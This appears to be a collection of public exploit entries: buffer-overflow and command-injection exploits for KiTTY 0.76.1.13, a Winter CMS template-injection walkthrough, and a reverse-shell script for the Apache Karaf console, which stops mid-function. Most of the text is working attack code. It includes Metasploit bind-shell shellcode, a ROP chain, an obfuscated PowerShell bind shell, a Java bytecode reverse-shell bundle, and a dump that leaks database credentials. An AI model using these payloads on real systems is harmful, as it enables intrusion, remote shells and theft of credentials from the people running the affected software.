-
KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: CVE-2024-25004 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1 # # msf6 payload(windows/shell_bind_tcp) > # # [*] Started bind TCP handler against 192.168.100.28:4444 # # [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444) # #-------------------------------------------------------------------------------------# import sys import os import struct #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py # # windows/shell_bind_tcp - 355 bytes # # https://metasploit.com/ # # Encoder: x86/shikata_ga_nai # # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, # # PrependMigrate=false, EXITFUNC=process, CreateSession=true, # # AutoVerifySession=true # #-------------------------------------------------------------------------------------# buf = b"" buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e" buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90" buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d" buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e" buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f" buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52" buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e" buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a" 
buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a" buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22" buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7" buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a" buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7" buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf" buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd" buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12" buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17" buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81" buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40" buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0" buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30" buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3" buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56" buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb" buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3" buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39" buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea" buf += b"\xc5\xd5\xfb\xb6\x6c\x7e\xa2\x23\x2d\xe3\x55\x9e" buf += b"\x72\x1a\xd6\x2a\x0b\xd9\xc6\x5f\x0e\xa5\x40\x8c" buf += b"\x62\xb6\x24\xb2\xd1\xb7\x6c" def shellcode(): sc = b'' sc += b'\xBB\x44\x24\x44\x44' # mov ebx,0x44442444 sc += b'\xB8\x44\x44\x44\x44' # mov eax,0x44444444 sc += b'\x29\xD8' # sub eax,ebx sc += b'\x29\xC4' # sub esp,eax sc += buf sc += b'\x90' * (1042-len(sc)) assert len(sc) == 1042 return sc def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe] 0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe] 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler 
(compensate) 0x41414141, # Filler (compensate) 0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe] 0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe] #[---INFO:gadgets_to_set_ebp:---] 0x00429953, # POP EBP # RETN [kitty.exe] 0x005405b0, # PUSH ESP; RETN 0 [kitty.exe] #[---INFO:gadgets_to_set_ebx:---] 0x0049d9f9, # POP EBX # RETN [kitty.exe] 0x00000201, # 0x00000201-> ebx #[---INFO:gadgets_to_set_edx:---] 0x00430dce, # POP EDX # RETN [kitty.exe] 0x00000040, # 0x00000040-> edx #[---INFO:gadgets_to_set_ecx:---] 0x005ac58c, # POP ECX # RETN [kitty.exe] 0x004d81d9, # &Writable location [kitty.exe] #[---INFO:gadgets_to_set_edi:---] 0x004fa404, # POP EDI # RETN [kitty.exe] 0x005a2001, # RETN (ROP NOP) [kitty.exe] #[---INFO:gadgets_to_set_eax:---] 0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe] 0x90909090, # nop 0x41414141, # Filler (compensate) #[---INFO:pushad:---] 0x005dfbac, # PUSHAD # RETN [kitty.exe] ] return b''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() #----------------------------------------------------------------------------------# # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x9d # # Return Address Information: 0x00529720 : {pivot 324 / 0x144} : # # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN # # ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE} # # Shellcode size at ESP: 1042 bytes # #----------------------------------------------------------------------------------# return_address = struct.pack('<I', 0x00529720) # ADD ESP,134 # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull {PAGE_EXECUTE_READWRITE} rop_chain_padding = b'\x90' * 27 nops = b'\x90' * 88 escape_sequence = b'\033]0;__dt:localhost:' + shellcode() + return_address escape_sequence += rop_chain_padding + rop_chain escape_sequence += b'\xE9\x3D\xFA\xFF\xFF' # jmp $eip-1471 escape_sequence += nops + b'\007' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence) stdout.flush()
-
KiTTY 0.76.1.13 - Command Injection
# Exploit Title: KiTTY 0.76.1.13 - Command Injection # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: CVE-2024-23749 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1 # # msf6 payload(cmd/windows/powershell_bind_tcp) > # # [*] Started bind TCP handler against 192.168.100.28:4444 # # [*] Powershell session session 1 opened (192.168.100.119:36969 -> 192.168.100.28:4444) # #----------------------------------------------------------------------------------------# import os import sys #-----------------------------------------------------------------# # msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw # #-----------------------------------------------------------------# shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create' shellcode += b'((New-Object System.IO.StreamReader(New-Object System.IO.Compression.G' shellcode += b'zipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBa' shellcode += b'se64String(((\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey' shellcode += b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\'+\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh' shellcode += b'kvUBgYPA3APsGG\'+\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4' shellcode += b'jBeXa\'+\'QgRGld\'+\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1' shellcode += b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\'+\'AFWMm85{2}gI/hVGUK' shellcode += b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\'+\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM' shellcode += 
b'8kWhDlXHr\'+\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB' shellcode += b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f' shellcode += b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0' shellcode += b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\'+' shellcode += b'\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\'+' shellcode += b'\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\'+\'1Txf3SQJhG8E/BlNRyY' shellcode += b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\'+\'T3Ztk3Tt{2}2' shellcode += b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+' shellcode += b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k' shellcode += b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\'+\'IyoERfSimrYbXTGP{1}g1Jc' shellcode += b'7\'+\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL' shellcode += b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve' shellcode += b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\')-f' shellcode += b'\'=\',\'9\',\'O\')))),[System.IO.Compression.CompressionMode]::Decompr' shellcode += b'ess))).ReadToEnd()))\"' escape_sequence = b'\033]0;__rv:' escape_sequence += b'" & ' escape_sequence += shellcode escape_sequence += b' #\007' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence) stdout.flush()
-
Winter CMS 1.2.3 - Server-Side Template Injection (SSTI) (Authenticated)
# Exploit Title: Winter CMS 1.2.2 - Server-Side Template Injection (SSTI) (Authenticated) # Exploit Author: tmrswrr # Date: 12/05/2023 # Vendor: https://wintercms.com/ # Software Link: https://github.com/wintercms/winter/releases/v1.2.2 # Vulnerable Version(s): 1.2.2 #Tested : https://www.softaculous.com/demos/WinterCMS 1 ) Login with admin cred and click CMS > Pages field > Plugin components > https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup 2 ) Write SSTI payload : {{7*7}} 3 ) Save it , Click Priview : https://demos6.demo.com/WinterCMS/demo/plugins 4 ) You will be see result : 49 Payload : {{ dump() }} Result : "*::database" => array:4 [▼ "default" => "mysql" "connections" => array:4 [▼ "sqlite" => array:5 [▼ "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite" "driver" => "sqlite" "foreign_key_constraints" => true "prefix" => "" "url" => null ] "mysql" => array:15 [▼ "charset" => "utf8mb4" "collation" => "utf8mb4_unicode_ci" "database" => "soft_pw3qsny" "driver" => "mysql" "engine" => "InnoDB" "host" => "localhost" "options" => [] "password" => "8QSz9(pT)3" "port" => 3306 "prefix" => "" "prefix_indexes" => true "strict" => true "unix_socket" => "" "url" => null "username" => "soft_pw3qsny" ] "pgsql" => array:12 [▶] "sqlsrv" => array:10 [▶] ] "migrations" => "migrations" "redis" => array:4 [▼ "client" => "phpredis" "options" => array:2 [▼ "cluster" => "redis" "prefix" => "winter_database_" ] "default" => array:5 [▼ "database" => "0" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] "cache" => array:5 [▼ "database" => "1" "host" => "127.0.0.1" "password" => null "port" => "6379" "url" => null ] ] ] ]
-
Karaf v4.4.3 Console - RCE
#!/usr/bin/python # Exploit Title: [Karaf v4.4.3 Console RCE] # Date: [2023-08-07] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-karaf-exploits.git] # Vendor Homepage: [https://karaf.apache.org] # Software Link: [https://karaf.apache.org/download.html] # Version: [4.4.3] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Example: # python exploit.py --rhost=192.168.0.133 --rport=1337 \ # --lhost=192.168.0.100 --lport=4444 \ # --creds=karaf:karaf """ This tool will let you open a reverse shell from the system that is running Karaf Console", """ import argparse import base64 import io import re import zipfile import requests # Content of the MANIFEST.MF file. MANIFEST_CONTENT = \ "Bundle-Name: RevShell\n" \ "Bundle-Description: Bundle openning a reverse shell connection.\n" \ "Bundle-SymbolicName: com.visionspace.osgi.revshell.Activator\n" \ "Bundle-Vendor: VisionSpace\n" \ "Bundle-Version: 1.0.0\n" \ "Import-Package: org.osgi.framework\n" \ "Bundle-Activator: com.visionspace.osgi.revshell.Activator" # Activator.class bytecode template. 
ACTIVATOR_CLASS_BYTECODE_TEMPLATE = \ b"\xca\xfe\xba\xbe\x00\x00\x00\x37\x00\x7b" \ b"\x0a\x00\x22\x00\x33\x08\x00\x34\x07\x00" \ b"\x35\x07\x00\x36\x0a\x00\x03\x00\x37\x0a" \ b"\x00\x03\x00\x38\x0a\x00\x03\x00\x39\x07" \ b"\x00\x3a\x08\x00\x3b\x08\x00\x3c\x0a\x00" \ b"\x3d\x00\x3e\x0a\x00\x08\x00\x3f\x0a\x00" \ b"\x2c\x00\x40\x0a\x00\x2c\x00\x41\x0a\x00" \ b"\x08\x00\x40\x0a\x00\x2c\x00\x42\x0a\x00" \ b"\x08\x00\x42\x0a\x00\x08\x00\x43\x0a\x00" \ b"\x2d\x00\x44\x0a\x00\x2d\x00\x45\x0a\x00" \ b"\x2e\x00\x46\x0a\x00\x2e\x00\x47\x05\x00" \ b"\x00\x00\x00\x00\x00\x00\x32\x0a\x00\x48" \ b"\x00\x49\x0a\x00\x2c\x00\x4a\x07\x00\x4b" \ b"\x0a\x00\x2c\x00\x4c\x0a\x00\x08\x00\x4d" \ b"\x09\x00\x4e\x00\x4f\x08\x00\x50\x0a\x00" \ b"\x51\x00\x52\x07\x00\x53\x07\x00\x54\x07" \ b"\x00\x55\x01\x00\x06\x3c\x69\x6e\x69\x74" \ b"\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04" \ b"\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e" \ b"\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62" \ b"\x6c\x65\x01\x00\x05\x73\x74\x61\x72\x74" \ b"\x01\x00\x25\x28\x4c\x6f\x72\x67\x2f\x6f" \ b"\x73\x67\x69\x2f\x66\x72\x61\x6d\x65\x77" \ b"\x6f\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65" \ b"\x43\x6f\x6e\x74\x65\x78\x74\x3b\x29\x56" \ b"\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61" \ b"\x70\x54\x61\x62\x6c\x65\x07\x00\x56\x07" \ b"\x00\x57\x07\x00\x58\x07\x00\x59\x01\x00" \ b"\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e" \ b"\x73\x01\x00\x04\x73\x74\x6f\x70\x01\x00" \ b"\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c" \ b"\x65\x01\x00\x0e\x41\x63\x74\x69\x76\x61" \ b"\x74\x6f\x72\x2e\x6a\x61\x76\x61\x0c\x00" \ b"\x24\x00\x25\x01\x00\x02\x73\x68\x01\x00" \ b"\x18\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \ b"\x2f\x50\x72\x6f\x63\x65\x73\x73\x42\x75" \ b"\x69\x6c\x64\x65\x72\x01\x00\x10\x6a\x61" \ b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" \ b"\x72\x69\x6e\x67\x0c\x00\x24\x00\x5a\x0c" \ b"\x00\x5b\x00\x5c\x0c\x00\x28\x00\x5d\x01" \ b"\x00\x0f\x6a\x61\x76\x61\x2f\x6e\x65\x74" \ b"\x2f\x53\x6f\x63\x6b\x65\x74\x01\x00\x07" \ 
b"\x3c\x4c\x48\x4f\x53\x54\x3e\x01\x00\x07" \ b"\x3c\x4c\x50\x4f\x52\x54\x3e\x07\x00\x5e" \ b"\x0c\x00\x5f\x00\x60\x0c\x00\x24\x00\x61" \ b"\x0c\x00\x62\x00\x63\x0c\x00\x64\x00\x63" \ b"\x0c\x00\x65\x00\x66\x0c\x00\x67\x00\x68" \ b"\x0c\x00\x69\x00\x6a\x0c\x00\x6b\x00\x6a" \ b"\x0c\x00\x6c\x00\x6d\x0c\x00\x6e\x00\x25" \ b"\x07\x00\x6f\x0c\x00\x70\x00\x71\x0c\x00" \ b"\x72\x00\x6a\x01\x00\x13\x6a\x61\x76\x61" \ b"\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65" \ b"\x70\x74\x69\x6f\x6e\x0c\x00\x73\x00\x25" \ b"\x0c\x00\x74\x00\x25\x07\x00\x75\x0c\x00" \ b"\x76\x00\x77\x01\x00\x1d\x54\x68\x61\x6e" \ b"\x6b\x20\x79\x6f\x75\x20\x66\x6f\x72\x20" \ b"\x70\x77\x6e\x69\x6e\x67\x20\x77\x69\x74" \ b"\x68\x20\x75\x73\x21\x07\x00\x78\x0c\x00" \ b"\x79\x00\x7a\x01\x00\x27\x63\x6f\x6d\x2f" \ b"\x76\x69\x73\x69\x6f\x6e\x73\x70\x61\x63" \ b"\x65\x2f\x6f\x73\x67\x69\x2f\x72\x65\x76" \ b"\x73\x68\x65\x6c\x6c\x2f\x41\x63\x74\x69" \ b"\x76\x61\x74\x6f\x72\x01\x00\x10\x6a\x61" \ b"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" \ b"\x6a\x65\x63\x74\x01\x00\x22\x6f\x72\x67" \ b"\x2f\x6f\x73\x67\x69\x2f\x66\x72\x61\x6d" \ b"\x65\x77\x6f\x72\x6b\x2f\x42\x75\x6e\x64" \ b"\x6c\x65\x41\x63\x74\x69\x76\x61\x74\x6f" \ b"\x72\x01\x00\x20\x6f\x72\x67\x2f\x6f\x73" \ b"\x67\x69\x2f\x66\x72\x61\x6d\x65\x77\x6f" \ b"\x72\x6b\x2f\x42\x75\x6e\x64\x6c\x65\x43" \ b"\x6f\x6e\x74\x65\x78\x74\x01\x00\x11\x6a" \ b"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50" \ b"\x72\x6f\x63\x65\x73\x73\x01\x00\x13\x6a" \ b"\x61\x76\x61\x2f\x69\x6f\x2f\x49\x6e\x70" \ b"\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00" \ b"\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f" \ b"\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61" \ b"\x6d\x01\x00\x16\x28\x5b\x4c\x6a\x61\x76" \ b"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72" \ b"\x69\x6e\x67\x3b\x29\x56\x01\x00\x13\x72" \ b"\x65\x64\x69\x72\x65\x63\x74\x45\x72\x72" \ b"\x6f\x72\x53\x74\x72\x65\x61\x6d\x01\x00" \ b"\x1d\x28\x5a\x29\x4c\x6a\x61\x76\x61\x2f" \ b"\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65" \ 
b"\x73\x73\x42\x75\x69\x6c\x64\x65\x72\x3b" \ b"\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61" \ b"\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63" \ b"\x65\x73\x73\x3b\x01\x00\x11\x6a\x61\x76" \ b"\x61\x2f\x6c\x61\x6e\x67\x2f\x49\x6e\x74" \ b"\x65\x67\x65\x72\x01\x00\x08\x70\x61\x72" \ b"\x73\x65\x49\x6e\x74\x01\x00\x15\x28\x4c" \ b"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" \ b"\x53\x74\x72\x69\x6e\x67\x3b\x29\x49\x01" \ b"\x00\x16\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \ b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \ b"\x3b\x49\x29\x56\x01\x00\x0e\x67\x65\x74" \ b"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61" \ b"\x6d\x01\x00\x17\x28\x29\x4c\x6a\x61\x76" \ b"\x61\x2f\x69\x6f\x2f\x49\x6e\x70\x75\x74" \ b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x0e" \ b"\x67\x65\x74\x45\x72\x72\x6f\x72\x53\x74" \ b"\x72\x65\x61\x6d\x01\x00\x0f\x67\x65\x74" \ b"\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65" \ b"\x61\x6d\x01\x00\x18\x28\x29\x4c\x6a\x61" \ b"\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70" \ b"\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01" \ b"\x00\x08\x69\x73\x43\x6c\x6f\x73\x65\x64" \ b"\x01\x00\x03\x28\x29\x5a\x01\x00\x09\x61" \ b"\x76\x61\x69\x6c\x61\x62\x6c\x65\x01\x00" \ b"\x03\x28\x29\x49\x01\x00\x04\x72\x65\x61" \ b"\x64\x01\x00\x05\x77\x72\x69\x74\x65\x01" \ b"\x00\x04\x28\x49\x29\x56\x01\x00\x05\x66" \ b"\x6c\x75\x73\x68\x01\x00\x10\x6a\x61\x76" \ b"\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72" \ b"\x65\x61\x64\x01\x00\x05\x73\x6c\x65\x65" \ b"\x70\x01\x00\x04\x28\x4a\x29\x56\x01\x00" \ b"\x09\x65\x78\x69\x74\x56\x61\x6c\x75\x65" \ b"\x01\x00\x07\x64\x65\x73\x74\x72\x6f\x79" \ b"\x01\x00\x05\x63\x6c\x6f\x73\x65\x01\x00" \ b"\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" \ b"\x2f\x53\x79\x73\x74\x65\x6d\x01\x00\x03" \ b"\x6f\x75\x74\x01\x00\x15\x4c\x6a\x61\x76" \ b"\x61\x2f\x69\x6f\x2f\x50\x72\x69\x6e\x74" \ b"\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x13" \ b"\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x50\x72" \ b"\x69\x6e\x74\x53\x74\x72\x65\x61\x6d\x01" \ b"\x00\x07\x70\x72\x69\x6e\x74\x6c\x6e\x01" \ 
b"\x00\x15\x28\x4c\x6a\x61\x76\x61\x2f\x6c" \ b"\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" \ b"\x3b\x29\x56\x00\x21\x00\x21\x00\x22\x00" \ b"\x01\x00\x23\x00\x00\x00\x03\x00\x01\x00" \ b"\x24\x00\x25\x00\x01\x00\x26\x00\x00\x00" \ b"\x1d\x00\x01\x00\x01\x00\x00\x00\x05\x2a" \ b"\xb7\x00\x01\xb1\x00\x00\x00\x01\x00\x27" \ b"\x00\x00\x00\x06\x00\x01\x00\x00\x00\x0a" \ b"\x00\x01\x00\x28\x00\x29\x00\x02\x00\x26" \ b"\x00\x00\x01\x6e\x00\x06\x00\x0b\x00\x00" \ b"\x00\xb8\x12\x02\x4d\xbb\x00\x03\x59\x04" \ b"\xbd\x00\x04\x59\x03\x2c\x53\xb7\x00\x05" \ b"\x04\xb6\x00\x06\xb6\x00\x07\x4e\xbb\x00" \ b"\x08\x59\x12\x09\x12\x0a\xb8\x00\x0b\xb7" \ b"\x00\x0c\x3a\x04\x2d\xb6\x00\x0d\x3a\x05" \ b"\x2d\xb6\x00\x0e\x3a\x06\x19\x04\xb6\x00" \ b"\x0f\x3a\x07\x2d\xb6\x00\x10\x3a\x08\x19" \ b"\x04\xb6\x00\x11\x3a\x09\x19\x04\xb6\x00" \ b"\x12\x9a\x00\x5f\x19\x05\xb6\x00\x13\x9e" \ b"\x00\x10\x19\x09\x19\x05\xb6\x00\x14\xb6" \ b"\x00\x15\xa7\xff\xee\x19\x06\xb6\x00\x13" \ b"\x9e\x00\x10\x19\x09\x19\x06\xb6\x00\x14" \ b"\xb6\x00\x15\xa7\xff\xee\x19\x07\xb6\x00" \ b"\x13\x9e\x00\x10\x19\x08\x19\x07\xb6\x00" \ b"\x14\xb6\x00\x15\xa7\xff\xee\x19\x09\xb6" \ b"\x00\x16\x19\x08\xb6\x00\x16\x14\x00\x17" \ b"\xb8\x00\x19\x2d\xb6\x00\x1a\x57\xa7\x00" \ b"\x08\x3a\x0a\xa7\xff\x9f\x2d\xb6\x00\x1c" \ b"\x19\x04\xb6\x00\x1d\xb1\x00\x01\x00\xa1" \ b"\x00\xa6\x00\xa9\x00\x1b\x00\x02\x00\x27" \ b"\x00\x00\x00\x66\x00\x19\x00\x00\x00\x0c" \ b"\x00\x03\x00\x0e\x00\x1a\x00\x0f\x00\x2a" \ b"\x00\x10\x00\x30\x00\x11\x00\x36\x00\x12" \ b"\x00\x3d\x00\x13\x00\x43\x00\x14\x00\x4a" \ b"\x00\x15\x00\x52\x00\x16\x00\x5a\x00\x17" \ b"\x00\x67\x00\x18\x00\x6f\x00\x19\x00\x7c" \ b"\x00\x1a\x00\x84\x00\x1b\x00\x91\x00\x1c" \ b"\x00\x96\x00\x1d\x00\x9b\x00\x1e\x00\xa1" \ b"\x00\x20\x00\xa6\x00\x21\x00\xa9\x00\x22" \ b"\x00\xab\x00\x23\x00\xae\x00\x25\x00\xb2" \ b"\x00\x26\x00\xb7\x00\x27\x00\x2a\x00\x00" \ b"\x00\x30\x00\x07\xff\x00\x4a\x00\x0a\x07" \ b"\x00\x21\x07\x00\x2b\x07\x00\x04\x07\x00" \ 
b"\x2c\x07\x00\x08\x07\x00\x2d\x07\x00\x2d" \ b"\x07\x00\x2d\x07\x00\x2e\x07\x00\x2e\x00" \ b"\x00\x07\x14\x14\x14\x57\x07\x00\x1b\x04" \ b"\x00\x2f\x00\x00\x00\x04\x00\x01\x00\x1b" \ b"\x00\x01\x00\x30\x00\x29\x00\x02\x00\x26" \ b"\x00\x00\x00\x25\x00\x02\x00\x02\x00\x00" \ b"\x00\x09\xb2\x00\x1e\x12\x1f\xb6\x00\x20" \ b"\xb1\x00\x00\x00\x01\x00\x27\x00\x00\x00" \ b"\x0a\x00\x02\x00\x00\x00\x2a\x00\x08\x00" \ b"\x2b\x00\x2f\x00\x00\x00\x04\x00\x01\x00" \ b"\x1b\x00\x01\x00\x31\x00\x00\x00\x02\x00" \ b"\x32" # Items to be replaces within the bytecode of Activator.class # <LEN><LHOST> = <\x07><\x3c\x4c\x48\x4f\x53\x54\x3e> ACTIVATOR_CLASS_LHOST_TAG = b"\x07\x3c\x4c\x48\x4f\x53\x54\x3e" # <LEN><LPORT> = <\x07><\x3c\x4c\x50\x4f\x52\x54\x3e> ACTIVATOR_CLASS_LPORT_TAG = b"\x07\x3c\x4c\x50\x4f\x52\x54\x3e" def parse(): """ This function parses the command-line arguments. """ parser = argparse.ArgumentParser( prog="Karaf-Console-RCE", description="This tool will let you open a reverse shell from the " "system that is running Karaf Console", epilog="Happy Hacking! :)", ) parser.add_argument("--rhost", dest="rhost", help="remote host", type=str, required=True) parser.add_argument("--rport", dest="rport", help="remote port", type=int, required=True) parser.add_argument("--lhost", dest="lhost", help="local host", type=str, required=True) parser.add_argument("--lport", dest="lport", help="local port", type=int, required=True) parser.add_argument("--creds", dest="creds", help="credentials in format <username:password>", type=str, required=True) parser.add_argument("--version", action="version", version="%(prog)s 0.1.0") return parser.parse_args() def extract_jsessionid(cookie): """ This function extracts the JSESSIONID from the cookie string. 
